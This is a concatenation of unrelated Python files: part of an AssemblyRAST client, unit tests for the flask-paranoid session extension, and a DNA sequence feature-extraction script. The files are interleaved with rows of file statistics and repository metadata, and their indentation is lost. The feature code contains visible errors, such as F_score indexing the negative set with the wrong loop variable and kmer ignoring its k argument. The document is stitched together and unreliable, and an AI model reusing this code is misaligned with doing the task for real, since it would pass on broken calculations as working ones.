:param params: instance of type "ArastParams" (Call AssemblyRAST.
workspace_name - the name of the workspace for input/output
read_library_name - the name of the PE read library (SE library
support in the future) output_contig_set_name - the name of the
output contigset extra_params - assembler specific parameters
min_contig_length - minimum length of contigs to output, default
200 @optional recipe @optional assembler @optional pipeline
@optional min_contig_len) -> structure: parameter "workspace_name"
of String, parameter "read_library_names" of list of String,
parameter "read_library_refs" of list of String, parameter
"output_contigset_name" of String, parameter "recipe" of String,
parameter "assembler" of String, parameter "pipeline" of String,
parameter "min_contig_len" of Long
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
return self._client.call_method(
'AssemblyRAST.run_arast',
[params], self._service_ver, context)
def status(self, context=None):
return self._client.call_method('AssemblyRAST.status',
[], self._service_ver, context)
| 53.619217
| 79
| 0.662707
| 1,802
| 15,067
| 5.338513
| 0.084906
| 0.065696
| 0.102495
| 0.044595
| 0.897713
| 0.897713
| 0.881913
| 0.847609
| 0.843971
| 0.839189
| 0
| 0.003894
| 0.267074
| 15,067
| 280
| 80
| 53.810714
| 0.867246
| 0.689985
| 0
| 0.333333
| 1
| 0
| 0.10802
| 0.059574
| 0
| 0
| 0
| 0
| 0
| 1
| 0.19697
| false
| 0.030303
| 0.045455
| 0.015152
| 0.439394
| 0.015152
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
88b965176b7d3406fe9f2c44273da8b2d0b23591
| 197
|
py
|
Python
|
fppy/abstract_algebra/category_algebra.py
|
threecifanggen/python-functional-programming
|
bd17281e5f24db826266f509bc54b25362c0d2a1
|
[
"MIT"
] | 3
|
2021-10-05T09:12:36.000Z
|
2021-11-30T07:11:58.000Z
|
fppy/abstract_algebra/category_algebra.py
|
threecifanggen/python-functional-programming
|
bd17281e5f24db826266f509bc54b25362c0d2a1
|
[
"MIT"
] | 14
|
2021-10-11T05:31:15.000Z
|
2021-12-16T12:52:47.000Z
|
fppy/abstract_algebra/category_algebra.py
|
threecifanggen/python-functional-programming
|
bd17281e5f24db826266f509bc54b25362c0d2a1
|
[
"MIT"
] | null | null | null |
'''
Author: huangbaochen<huangbaochenwo@live.com>
Date: 2021-12-12 19:58:25
LastEditTime: 2021-12-12 19:58:25
LastEditors: huangbaochen<huangbaochenwo@live.com>
Description: 范畴学相关抽象代数
No MERCY
'''
| 21.888889
| 50
| 0.781726
| 28
| 197
| 5.5
| 0.607143
| 0.337662
| 0.38961
| 0.428571
| 0.181818
| 0.181818
| 0
| 0
| 0
| 0
| 0
| 0.154696
| 0.081218
| 197
| 8
| 51
| 24.625
| 0.696133
| 0.954315
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
88e8b0862ebbb52963a5959d4a09aeafeab8d74f
| 5,916
|
py
|
Python
|
tests/test_paranoid.py
|
nehaljwani/flask-paranoid
|
ec6205756d55edd1b135249b9bb345871fef0977
|
[
"MIT"
] | 68
|
2017-06-30T06:52:27.000Z
|
2022-03-22T02:39:58.000Z
|
tests/test_paranoid.py
|
nehaljwani/flask-paranoid
|
ec6205756d55edd1b135249b9bb345871fef0977
|
[
"MIT"
] | 8
|
2017-08-02T04:28:36.000Z
|
2022-01-01T12:53:13.000Z
|
tests/test_paranoid.py
|
nehaljwani/flask-paranoid
|
ec6205756d55edd1b135249b9bb345871fef0977
|
[
"MIT"
] | 7
|
2017-08-02T02:33:58.000Z
|
2020-11-19T08:50:00.000Z
|
import sys
import unittest
from flask import Flask
from flask_paranoid import Paranoid
class ParanoidTests(unittest.TestCase):
def _delete_cookie(self, name):
return (name + '=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; '
'Max-Age=0; Path=/')
def test_401(self):
app = Flask(__name__)
app.config['SECRET_KEY'] = 'foo'
Paranoid(app)
@app.route('/')
def index():
return 'foobar'
client = app.test_client(use_cookies=True)
rv = client.get('/', headers={'User-Agent': 'foo'})
self.assertEqual(rv.status_code, 200)
rv = client.get('/', headers={'User-Agent': 'foo'})
self.assertEqual(rv.status_code, 200)
rv = client.get('/', headers={'User-Agent': 'bar'})
self.assertEqual(rv.status_code, 401)
self.assertIn(self._delete_cookie('session'),
rv.headers.getlist('Set-Cookie'))
self.assertNotIn(self._delete_cookie('remember_token'),
rv.headers.getlist('Set-Cookie'))
def test_redirect_no_domain(self):
app = Flask(__name__)
app.config['SECRET_KEY'] = 'foo'
paranoid = Paranoid(app)
paranoid.redirect_view = '/foobarbaz'
@app.route('/')
def index():
return 'foobar'
client = app.test_client(use_cookies=True)
self.assertEqual(paranoid.redirect_view, '/foobarbaz')
rv = client.get('/', headers={'User-Agent': 'foo'})
self.assertEqual(rv.status_code, 200)
rv = client.get('/', headers={'User-Agent': 'bar'})
self.assertEqual(rv.status_code, 302)
self.assertEqual(rv.headers['Location'], 'http://localhost/foobarbaz')
self.assertIn(self._delete_cookie('session'),
rv.headers.getlist('Set-Cookie'))
self.assertNotIn(self._delete_cookie('remember_token'),
rv.headers.getlist('Set-Cookie'))
def test_redirect_domain(self):
app = Flask(__name__)
app.config['SECRET_KEY'] = 'foo'
paranoid = Paranoid(app)
paranoid.redirect_view = 'https://foo.com/foobarbaz'
@app.route('/')
def index():
return 'foobar'
client = app.test_client(use_cookies=True)
self.assertEqual(paranoid.redirect_view, 'https://foo.com/foobarbaz')
rv = client.get('/', headers={'User-Agent': 'foo'})
self.assertEqual(rv.status_code, 200)
rv = client.get('/', headers={'User-Agent': 'bar'})
self.assertEqual(rv.status_code, 302)
self.assertEqual(rv.headers['Location'], 'https://foo.com/foobarbaz')
self.assertIn(self._delete_cookie('session'),
rv.headers.getlist('Set-Cookie'))
self.assertNotIn(self._delete_cookie('remember_token'),
rv.headers.getlist('Set-Cookie'))
def test_redirect_view(self):
app = Flask(__name__)
app.config['SECRET_KEY'] = 'foo'
paranoid = Paranoid(app)
paranoid.redirect_view = 'custom_redirect'
@app.route('/')
def index():
return 'foobar'
@app.route('/redirect')
def custom_redirect():
return 'foo'
client = app.test_client(use_cookies=True)
self.assertEqual(paranoid.redirect_view, 'custom_redirect')
rv = client.get('/', headers={'User-Agent': 'foo'})
self.assertEqual(rv.status_code, 200)
rv = client.get('/', headers={'User-Agent': 'bar'})
self.assertEqual(rv.status_code, 302)
self.assertEqual(rv.headers['Location'], 'http://localhost/redirect')
self.assertIn(self._delete_cookie('session'),
rv.headers.getlist('Set-Cookie'))
self.assertNotIn(self._delete_cookie('remember_token'),
rv.headers.getlist('Set-Cookie'))
def test_callback(self):
app = Flask(__name__)
app.config['SECRET_KEY'] = 'foo'
paranoid = Paranoid()
paranoid.init_app(app)
paranoid.redirect_view = 'custom_redirect'
@app.route('/')
def index():
return 'foobar'
@paranoid.on_invalid_session
def custom_callback():
return 'foo'
client = app.test_client(use_cookies=True)
self.assertEqual(paranoid.redirect_view, custom_callback)
rv = client.get('/', headers={'User-Agent': 'foo'})
self.assertEqual(rv.status_code, 200)
rv = client.get('/', headers={'User-Agent': 'bar'})
self.assertEqual(rv.status_code, 200)
self.assertEqual(rv.get_data(as_text=True), 'foo')
self.assertIn(self._delete_cookie('session'),
rv.headers.getlist('Set-Cookie'))
self.assertNotIn(self._delete_cookie('remember_token'),
rv.headers.getlist('Set-Cookie'))
def test_flask_login(self):
app = Flask(__name__)
app.config['SECRET_KEY'] = 'foo'
paranoid = Paranoid(app)
paranoid.redirect_view = 'https://foo.com/foobarbaz'
@app.route('/')
def index():
return 'foobar'
client = app.test_client(use_cookies=True)
sys.modules['flask_login'] = 'foo'
self.assertEqual(paranoid.redirect_view, 'https://foo.com/foobarbaz')
rv = client.get('/', headers={'User-Agent': 'foo'})
self.assertEqual(rv.status_code, 200)
rv = client.get('/', headers={'User-Agent': 'bar'})
del sys.modules['flask_login']
self.assertEqual(rv.status_code, 302)
self.assertEqual(rv.headers['Location'], 'https://foo.com/foobarbaz')
self.assertIn(self._delete_cookie('session'),
rv.headers.getlist('Set-Cookie'))
self.assertIn(self._delete_cookie('remember_token'),
rv.headers.getlist('Set-Cookie'))
| 34.395349
| 78
| 0.588573
| 655
| 5,916
| 5.129771
| 0.120611
| 0.102679
| 0.091071
| 0.069643
| 0.878571
| 0.87381
| 0.872917
| 0.872917
| 0.872917
| 0.872917
| 0
| 0.012574
| 0.260649
| 5,916
| 171
| 79
| 34.596491
| 0.755601
| 0
| 0
| 0.753846
| 0
| 0
| 0.160243
| 0
| 0
| 0
| 0
| 0
| 0.269231
| 1
| 0.115385
| false
| 0
| 0.030769
| 0.069231
| 0.223077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0012575d9bbe988f5351e20be5536fe0832776eb
| 207
|
py
|
Python
|
trainer/__init__.py
|
weigq/UDA-1
|
4f97980980cafd0a2d02a77211ac7dbaf3e331f6
|
[
"MIT"
] | 32
|
2021-11-08T15:45:30.000Z
|
2022-03-30T09:08:57.000Z
|
trainer/__init__.py
|
weigq/UDA-1
|
4f97980980cafd0a2d02a77211ac7dbaf3e331f6
|
[
"MIT"
] | 3
|
2021-11-16T02:38:51.000Z
|
2022-02-21T13:29:58.000Z
|
trainer/__init__.py
|
weigq/UDA-1
|
4f97980980cafd0a2d02a77211ac7dbaf3e331f6
|
[
"MIT"
] | 4
|
2021-11-09T02:53:18.000Z
|
2021-12-21T22:11:35.000Z
|
# --------------------------------------------------------
# Copyright (c) 2021 Microsoft
# Licensed under The MIT License
# --------------------------------------------------------
from .da import *
| 29.571429
| 59
| 0.294686
| 12
| 207
| 5.083333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022099
| 0.125604
| 207
| 6
| 60
| 34.5
| 0.314917
| 0.835749
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0053dee75a18d059d69cf70dba94554a9fae7013
| 22,593
|
py
|
Python
|
MvLapKSRC_HSIC-master/construct_features.py
|
guofei-tju/MvLapKSRC_HSIC
|
dc9e6d54b834cee5ef9a088f71eb506307672902
|
[
"MIT"
] | null | null | null |
MvLapKSRC_HSIC-master/construct_features.py
|
guofei-tju/MvLapKSRC_HSIC
|
dc9e6d54b834cee5ef9a088f71eb506307672902
|
[
"MIT"
] | null | null | null |
MvLapKSRC_HSIC-master/construct_features.py
|
guofei-tju/MvLapKSRC_HSIC
|
dc9e6d54b834cee5ef9a088f71eb506307672902
|
[
"MIT"
] | null | null | null |
import itertools
import numpy as np
import pandas as pd
def F_score(v, y_label):
x_0 = 0
x_1 = 0
v_pos = v[y_label > 0]
v_neg = v[y_label <= 0]
v_ave = np.mean(v)
v_pos_ave = np.mean(v_pos)
v_neg_ave = np.mean(v_neg)
len_pos = len(v_pos)
len_neg = len(v_neg)
for i in range(len_pos):
x_0 += (v_pos[i] - v_pos_ave) ** 2
for j in range(len_neg):
x_1 += (v_neg[i] - v_neg_ave) ** 2
f_score = ((v_pos_ave - v_ave) ** 2 + (v_neg_ave - v_ave) ** 2) / (
(1 / (len_pos - 1)) * x_0 + (1 / (len_neg - 1)) * x_1)
return f_score
def make_kmer_list(k, alphabet):
try:
return ["".join(e) for e in itertools.product(alphabet, repeat=k)]
except TypeError:
print("TypeError: k must be an inter and larger than 0, alphabet must be a string.")
raise TypeError
except ValueError:
print("TypeError: k must be an inter and larger than 0")
raise ValueError
def kmer(data_seq, k):
# calculate the k-mer feature of a seq
RNA_code = 'ACGT'
code_values = make_kmer_list(3, RNA_code)
count = np.zeros((len(data_seq), len(code_values)))
for i, line_value in enumerate(data_seq.values): # for every samples
for j, code_value in enumerate(line_value[0]): # for every position
if j <= len(line_value[0]) - k + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + k]:
count[i][p] += 1
count /= len(code_values) - k + 1
return count
def MvPS3merNP(all_positive_seq, all_negative_seq, train_samples, test_sample, interval):
RNA_code = 'ACGT'
all_final_seq_value_tra = []
all_final_seq_value_tes = []
for train_sample in train_samples:
# calculate Z matrix
positive_seq = all_positive_seq[train_sample]
negative_seq = all_negative_seq[train_sample]
len_seq = len(positive_seq[0])
positive_df = pd.DataFrame(positive_seq)
positive_x_train = positive_df.iloc[:, :]
negative_df = pd.DataFrame(negative_seq)
negative_x_train = negative_df.iloc[:, :]
code_values = make_kmer_list(interval, RNA_code)
code_len = len(code_values)
positive_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
negative_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
for i, line_value in enumerate(positive_x_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
positive_seq_value[p][j] += 1
positive_seq_value = np.matrix(positive_seq_value) * 1.0 / (len(positive_seq))
for i, line_value in enumerate(negative_x_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
negative_seq_value[p][j] += 1
negative_seq_value = np.matrix(negative_seq_value) * 1.0 / (len(negative_seq))
tes_final_value = []
tra_final_value = []
# training features
for train_sample_x in train_samples:
tra_positive_seq = all_positive_seq[train_sample_x]
tra_negative_seq = all_negative_seq[train_sample_x]
tra_positive_df = pd.DataFrame(tra_positive_seq)
tra_negative_df = pd.DataFrame(tra_negative_seq)
tra_positive_train = tra_positive_df.iloc[:, :]
tra_negative_train = tra_negative_df.iloc[:, :]
tra_positive_negative_train = pd.concat([tra_positive_train, tra_negative_train], axis=0)
tra_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
range(len(tra_positive_negative_train))]
for i, line_value in enumerate(tra_positive_negative_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
tra_final_seq_value[i][j] = positive_seq_value[p, j] - negative_seq_value[p, j]
tra_final_value.append(tra_final_seq_value)
tes_positive_seq = all_positive_seq[test_sample]
tes_negative_seq = all_negative_seq[test_sample]
tes_positive_df = pd.DataFrame(tes_positive_seq)
tes_negative_df = pd.DataFrame(tes_negative_seq)
tes_positive_train = tes_positive_df.iloc[:, :]
tes_negative_train = tes_negative_df.iloc[:, :]
tes_positive_negative_train = pd.concat([tes_positive_train, tes_negative_train], axis=0)
tes_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
range(len(tes_positive_negative_train))]
for i, line_value in enumerate(tes_positive_negative_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
tes_final_seq_value[i][j] = positive_seq_value[p, j] - negative_seq_value[p, j]
tes_final_value.append(tes_final_seq_value)
all_final_seq_value_tra.append(np.concatenate(tra_final_value))
all_final_seq_value_tes.append(np.concatenate(tes_final_value))
X_train = np.array(all_final_seq_value_tra)
X_test = np.array(all_final_seq_value_tes)
return X_train, X_test
def MvPS3merNP_KL(all_positive_seq, all_negative_seq, train_samples, test_sample, interval):
RNA_code = 'ACGT'
all_final_seq_value_tra = []
all_final_seq_value_tes = []
for train_sample in train_samples:
# calculate Z matrix
positive_seq = all_positive_seq[train_sample]
negative_seq = all_negative_seq[train_sample]
len_seq = len(positive_seq[0])
positive_df = pd.DataFrame(positive_seq)
positive_x_train = positive_df.iloc[:, :]
negative_df = pd.DataFrame(negative_seq)
negative_x_train = negative_df.iloc[:, :]
code_values = make_kmer_list(interval, RNA_code)
code_len = len(code_values)
positive_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
negative_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
for i, line_value in enumerate(positive_x_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
positive_seq_value[p][j] += 1
positive_seq_value = np.matrix(positive_seq_value) * 1.0 / (len(positive_seq))
for i, line_value in enumerate(negative_x_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
negative_seq_value[p][j] += 1
negative_seq_value = np.matrix(negative_seq_value) * 1.0 / (len(negative_seq))
positive_seq_value[positive_seq_value <= 0] = 1e-09
positive_seq_value_log = np.log(positive_seq_value)
# positive_seq_value_log[np.isinf(positive_seq_value_log)] = -10
negative_seq_value[negative_seq_value <= 0] = 1e-09
negative_seq_value_log = np.log(negative_seq_value)
# negative_seq_value_log[np.isinf(negative_seq_value_log)] = -10
Z = np.multiply(positive_seq_value, (positive_seq_value_log - negative_seq_value_log))
tes_final_value = []
tra_final_value = []
# training features
for train_sample_x in train_samples:
tra_positive_seq = all_positive_seq[train_sample_x]
tra_negative_seq = all_negative_seq[train_sample_x]
tra_positive_df = pd.DataFrame(tra_positive_seq)
tra_negative_df = pd.DataFrame(tra_negative_seq)
tra_positive_train = tra_positive_df.iloc[:, :]
tra_negative_train = tra_negative_df.iloc[:, :]
tra_positive_negative_train = pd.concat([tra_positive_train, tra_negative_train], axis=0)
tra_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
range(len(tra_positive_negative_train))]
for i, line_value in enumerate(tra_positive_negative_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
tra_final_seq_value[i][j] = Z[p, j]
tra_final_value.append(tra_final_seq_value)
tes_positive_seq = all_positive_seq[test_sample]
tes_negative_seq = all_negative_seq[test_sample]
tes_positive_df = pd.DataFrame(tes_positive_seq)
tes_negative_df = pd.DataFrame(tes_negative_seq)
tes_positive_train = tes_positive_df.iloc[:, :]
tes_negative_train = tes_negative_df.iloc[:, :]
tes_positive_negative_train = pd.concat([tes_positive_train, tes_negative_train], axis=0)
tes_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
range(len(tes_positive_negative_train))]
for i, line_value in enumerate(tes_positive_negative_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
tes_final_seq_value[i][j] = Z[p, j]
tes_final_value.append(tes_final_seq_value)
all_final_seq_value_tra.append(np.concatenate(tra_final_value))
all_final_seq_value_tes.append(np.concatenate(tes_final_value))
X_train = np.array(all_final_seq_value_tra)
X_test = np.array(all_final_seq_value_tes)
return X_train, X_test
def MvPS3merNP_JS(all_positive_seq, all_negative_seq, train_samples, test_sample, interval):
RNA_code = 'ACGT'
all_final_seq_value_tra = []
all_final_seq_value_tes = []
for train_sample in train_samples:
# calculate Z matrix
positive_seq = all_positive_seq[train_sample]
negative_seq = all_negative_seq[train_sample]
len_seq = len(positive_seq[0])
positive_df = pd.DataFrame(positive_seq)
positive_x_train = positive_df.iloc[:, :]
negative_df = pd.DataFrame(negative_seq)
negative_x_train = negative_df.iloc[:, :]
code_values = make_kmer_list(interval, RNA_code)
code_len = len(code_values)
positive_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
negative_seq_value = [[0 for jj in range(len_seq - interval + 1)] for ii in range(code_len)]
for i, line_value in enumerate(positive_x_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
positive_seq_value[p][j] += 1
positive_seq_value = np.matrix(positive_seq_value) * 1.0 / (len(positive_seq))
for i, line_value in enumerate(negative_x_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
negative_seq_value[p][j] += 1
negative_seq_value = np.matrix(negative_seq_value) * 1.0 / (len(negative_seq))
positive_seq_value[positive_seq_value <= 0] = 1e-09
positive_seq_value_log = np.log(positive_seq_value)
# positive_seq_value_log[np.isinf(positive_seq_value_log)] = -10
negative_seq_value[negative_seq_value <= 0] = 1e-09
negative_seq_value_log = np.log(negative_seq_value)
# negative_seq_value_log[np.isinf(negative_seq_value_log)] = -10
seq_value_log = np.log((positive_seq_value + negative_seq_value) / 2)
Z = 1 / 2 * np.multiply(positive_seq_value, (positive_seq_value_log - seq_value_log)) + 1 / 2 * np.multiply(
negative_seq_value, (negative_seq_value_log - seq_value_log))
tes_final_value = []
tra_final_value = []
# training features
for train_sample_x in train_samples:
tra_positive_seq = all_positive_seq[train_sample_x]
tra_negative_seq = all_negative_seq[train_sample_x]
tra_positive_df = pd.DataFrame(tra_positive_seq)
tra_negative_df = pd.DataFrame(tra_negative_seq)
tra_positive_train = tra_positive_df.iloc[:, :]
tra_negative_train = tra_negative_df.iloc[:, :]
tra_positive_negative_train = pd.concat([tra_positive_train, tra_negative_train], axis=0)
tra_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
range(len(tra_positive_negative_train))]
for i, line_value in enumerate(tra_positive_negative_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
tra_final_seq_value[i][j] = Z[p, j]
tra_final_value.append(tra_final_seq_value)
tes_positive_seq = all_positive_seq[test_sample]
tes_negative_seq = all_negative_seq[test_sample]
tes_positive_df = pd.DataFrame(tes_positive_seq)
tes_negative_df = pd.DataFrame(tes_negative_seq)
tes_positive_train = tes_positive_df.iloc[:, :]
tes_negative_train = tes_negative_df.iloc[:, :]
tes_positive_negative_train = pd.concat([tes_positive_train, tes_negative_train], axis=0)
tes_final_seq_value = [[0 for ii in range(len_seq - interval + 1)] for jj in
range(len(tes_positive_negative_train))]
for i, line_value in enumerate(tes_positive_negative_train.values):
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - interval + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + interval]:
tes_final_seq_value[i][j] = Z[p, j]
tes_final_value.append(tes_final_seq_value)
all_final_seq_value_tra.append(np.concatenate(tra_final_value))
all_final_seq_value_tes.append(np.concatenate(tes_final_value))
X_train = np.array(all_final_seq_value_tra)
X_test = np.array(all_final_seq_value_tes)
return X_train, X_test
def PRO12(all_positive_seq, all_negative_seq, train_sample):
RNA_code = 'ACGT'
Z = {'AA': [0.85, 0.85, -0.22, -0.96, -0.73, -0.62, -0.09, 0.68, -1, 1, 0.36, 0.23],
'AC': [-1, -1, -0.6, -0.45, -0.27, 0.37, -0.64, 0.37, 0.05, 0.56, -0.48, 0.50],
'AG': [-0.56, -0.56, -1.00, 0.45, -0.27, -0.18, -0.36, 0.37, -0.12, -0.10, -0.39, 0.04],
'AT': [-0.01, -0.01, 1.00, -1.00, -1.00, -0.48, -1.00, 1.00, -0.31, -0.90, -1.00, 1.00],
'CA': [1.00, 1.00, 0.13, 1.00, -0.27, -0.65, -0.09, 0.16, 0.75, -0.14, 0.88, -0.77],
'CC': [-0.87, -0.87, -0.25, 0.81, 1.00, 0.15, 1.00, -0.47, 1.00, -0.75, -0.15, -0.35],
'CG': [-0.14, -0.14, -0.89, 0.80, 0.18, -0.10, 1.45, -1.00, 0.64, -0.45, 0.60, -1.00],
'CT': [-0.56, -0.56, -1.00, -0.29, -0.27, -0.18, -0.36, 0.37, -0.12, -1.00, -0.39, 0.04],
'GA': [0.87, 0.87, 0.43, 1.24, -0.27, -0.30, -0.36, 0.37, -0.02, 0.87, 0.65, 0.04],
'GC': [0.32, 0.32, 0.24, 1.17, 0.18, 1.00, 1.00, -0.47, 0.44, -0.54, 0.01, 0.27],
'GG': [-0.87, -0.87, -0.25, 0.63, 1.00, 0.15, 1.00, -0.47, 1.00, -0.14, -0.15, -0.35],
'GT': [-1.00, -1.00, -0.60, -0.29, -0.27, 0.37, -0.64, 0.37, 0.05, -0.90, -0.48, 0.50],
'TA': [0.32, 0.32, -0.84, 2.37, -1.00, -1.00, -0.45, 1.00, 0.29, -0.87, 1.00, -0.31],
'TC': [0.87, 0.87, 0.43, 0.24, -0.27, -0.30, -0.36, 0.37, -0.02, -0.45, 0.65, 0.04],
'TG': [1.00, 1.00, 0.13, 2.02, -0.27, -0.65, -0.09, 0.16, 0.75, 0.56, 0.88, -0.77],
'TT': [0.85, 0.85, -0.22, -1.00, -0.73, -0.62, -0.09, 0.68, -1.00, -0.77, 0.36, 0.23]}
code_values = make_kmer_list(2, RNA_code)
positive_seq = all_positive_seq[train_sample]
negative_seq = all_negative_seq[train_sample]
len_seq = len(positive_seq[0])
positive_df = pd.DataFrame(positive_seq)
positive_x_train = positive_df.iloc[:, :]
negative_df = pd.DataFrame(negative_seq)
negative_x_train = negative_df.iloc[:, :]
positive_negative_train = pd.concat([positive_x_train, negative_x_train], axis=0)
tra_final_seq_value = [[0 for ii in range(12 * (len_seq - 1))] for jj in
range(len(positive_negative_train))]
for i, line_value in enumerate(positive_negative_train.values): # for every samples
for j, code_value in enumerate(line_value[0]): # for every position
if j <= len(line_value[0]) - 2 + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + 2]:
tra_final_seq_value[i][(12 * j):(12 * (j + 1))] = np.array(Z[c_value])
tra_final_seq_value = np.array(tra_final_seq_value)
return tra_final_seq_value
def ratio(all_positive_seq, all_negative_seq, train_sample):
# calculate the GC content, GC skew,AT skew ,AT/GC ratio
positive_seq = all_positive_seq[train_sample]
negative_seq = all_negative_seq[train_sample]
positive_df = pd.DataFrame(positive_seq)
positive_x_train = positive_df.iloc[:, :]
negative_df = pd.DataFrame(negative_seq)
negative_x_train = negative_df.iloc[:, :]
positive_negative_train = pd.concat([positive_x_train, negative_x_train], axis=0)
tra_final_seq_value = np.zeros((len(positive_negative_train), 4))
for i, line_value in enumerate(positive_negative_train.values): # for every samples
A_count = line_value[0].count('A')
C_count = line_value[0].count('C')
G_count = line_value[0].count('G')
T_count = line_value[0].count('T')
tra_final_seq_value[i][0] = (C_count + G_count) / len(positive_negative_train)
tra_final_seq_value[i][1] = (C_count - G_count) / (C_count + G_count)
tra_final_seq_value[i][2] = (A_count - T_count) / (A_count + T_count)
tra_final_seq_value[i][3] = (A_count + T_count) / (C_count + G_count)
return tra_final_seq_value
def ChemicalProperty(all_positive_seq, all_negative_seq, train_sample):
RNA_code = 'ACGT'
X = {'A': [1, 1, 1], 'C': [0, 1, 0], 'G': [1, 0, 0], 'T': [0, 0, 1]}
positive_seq = all_positive_seq[train_sample]
negative_seq = all_negative_seq[train_sample]
len_seq = len(positive_seq[0])
positive_df = pd.DataFrame(positive_seq)
positive_x_train = positive_df.iloc[:, :]
negative_df = pd.DataFrame(negative_seq)
negative_x_train = negative_df.iloc[:, :]
positive_negative_train = pd.concat([positive_x_train, negative_x_train], axis=0)
code_values = make_kmer_list(1, RNA_code)
tra_final_seq_value = [[0 for ii in range(4 * (len_seq))] for jj in
range(len(positive_negative_train))]
for i, line_value in enumerate(positive_negative_train.values): # for every samples
for j, code_value in enumerate(line_value[0]):
if j <= len(line_value[0]) - 1 + 1:
for p, c_value in enumerate(code_values):
if c_value == line_value[0][j:j + 1]:
X_c_value = X[c_value] + [(line_value[0][:j + 1].count(c_value)) / (j + 1)]
tra_final_seq_value[i][(4 * j):(4 * (j + 1))] = X_c_value
tra_final_seq_value = np.array(tra_final_seq_value)
return tra_final_seq_value
def PseEiip(all_positive_seq, all_negative_seq, train_sample):
RNA_code = 'ACGT'
ea = 0.126
et = 0.1335
eg = 0.0806
ec = 0.134
eACGT = {'A': ea, 'C': et, 'G': eg, 'T': ec}
code_values = make_kmer_list(3, RNA_code)
emer = np.zeros((1, len(code_values)))
positive_seq = all_positive_seq[train_sample]
negative_seq = all_negative_seq[train_sample]
len_seq = len(positive_seq[0])
positive_df = pd.DataFrame(positive_seq)
positive_x_train = positive_df.iloc[:, :]
negative_df = pd.DataFrame(negative_seq)
negative_x_train = negative_df.iloc[:, :]
positive_negative_train = pd.concat([positive_x_train, negative_x_train], axis=0)
for i, code_value in enumerate(code_values):
emer[0][i] = eACGT[code_value[0]] + eACGT[code_value[1]] + eACGT[code_value[2]]
EMER = np.ones((len(positive_negative_train), 1)).dot(emer)
F = kmer(positive_negative_train, 3)
A = F * EMER
return A
| 46.202454
| 117
| 0.605232
| 3,385
| 22,593
| 3.707238
| 0.058198
| 0.07395
| 0.053869
| 0.031875
| 0.894414
